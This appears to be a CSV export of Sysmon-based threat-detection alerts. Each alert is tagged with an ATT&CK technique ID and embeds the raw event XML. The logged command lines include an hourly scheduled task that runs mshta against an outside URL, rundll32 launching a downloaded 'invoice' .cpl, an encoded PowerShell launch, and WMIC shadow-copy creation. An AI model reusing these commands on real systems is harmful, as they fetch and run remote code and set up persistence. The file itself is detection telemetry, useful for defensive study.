</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;, )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:11:17.587732Z"">
</TimeCreated>
<EventRecordID>4863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:11:17.445</Data>
<Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
<Data Name=""ProcessId"">4356</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
<Data Name=""LogonId"">0x4131b5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010A7B65500</Data>
<Data Name=""ParentProcessId"">4996</Data>
<Data Name=""ParentImage"">C:\Windows\System32\control.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\control.exe&quot; &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;, )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:11:17.587732Z"">
</TimeCreated>
<EventRecordID>4863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:11:17.445</Data>
<Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
<Data Name=""ProcessId"">4356</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
<Data Name=""LogonId"">0x4131b5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010A7B65500</Data>
<Data Name=""ParentProcessId"">4996</Data>
<Data Name=""ParentImage"">C:\Windows\System32\control.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\control.exe&quot; &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557681631.183699,2019-05-12T21:20:31.183699+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:20:01.980574Z"">
</TimeCreated>
<EventRecordID>16511</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:20:01.964</Data>
<Data Name=""ProcessGuid"">365ABB72-55C1-5CD8-0000-0010970D2F00</Data>
<Data Name=""ProcessId"">4092</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-502E-5CD8-0000-00102A330700</Data>
<Data Name=""ParentProcessId"">3192</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:32:58.167195Z"">
</TimeCreated>
<EventRecordID>16390</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:32:58.167</Data>
<Data Name=""ProcessGuid"">365ABB72-208A-5CD8-0000-0010119B2400</Data>
<Data Name=""ProcessId"">3560</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:32:58.167195Z"">
</TimeCreated>
<EventRecordID>16390</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:32:58.167</Data>
<Data Name=""ProcessGuid"">365ABB72-208A-5CD8-0000-0010119B2400</Data>
<Data Name=""ProcessId"">3560</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.893033,2019-05-27T05:29:18.893033+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;ERROR ( message:Configuration error &quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.893033Z"">
</TimeCreated>
<EventRecordID>5940</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.852</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00102FAAFF00</Data>
<Data Name=""ProcessId"">3304</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;ERROR ( message:Configuration error &quot; /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:32:58.167195Z"">
</TimeCreated>
<EventRecordID>16390</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:32:58.167</Data>
<Data Name=""ProcessGuid"">365ABB72-208A-5CD8-0000-0010119B2400</Data>
<Data Name=""ProcessId"">3560</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558497731.307031,2019-05-22T08:02:11.307031+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-22T04:02:11.307031Z"">
</TimeCreated>
<EventRecordID>839</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1920"" ThreadID=""824"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-22 04:02:11.287</Data>
<Data Name=""ProcessGuid"">365ABB72-C9C3-5CE4-0000-00101F422E00</Data>
<Data Name=""ProcessId"">2888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-C32E-5CE4-0000-00205DF00000</Data>
<Data Name=""LogonId"">0xf05d</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-C9C1-5CE4-0000-00100B222E00</Data>
<Data Name=""ParentProcessId"">3156</Data>
<Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; SCODEF:1600 CREDAT:275470 /prefetch:2</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969968.655114,2019-05-27T19:12:48.655114+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:47.478285Z"">
</TimeCreated>
<EventRecordID>6182</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:47.456</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6F-5CEB-0000-0010D33A0C00</Data>
<Data Name=""ProcessId"">3344</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE6F-5CEB-0000-0010F4370C00</Data>
<Data Name=""ParentProcessId"">3448</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436000.711201,2019-07-30T01:33:20.711201+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:20.711067Z"">
</TimeCreated>
<EventRecordID>4907</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-29 21:33:19.556</Data>
<Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-00107F248700</Data>
<Data Name=""ProcessId"">3164</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49826</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1558452779.809883,2019-05-21T19:32:59.809883+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR &quot;mshta.exe https://hotelesms.com/Injection.txt&quot; /F ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:59.769825Z"">
</TimeCreated>
<EventRecordID>4129</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:59.729</Data>
<Data Name=""ProcessGuid"">365ABB72-1A2B-5CE4-0000-00102F502201</Data>
<Data Name=""ProcessId"">3772</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Manages scheduled tasks</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
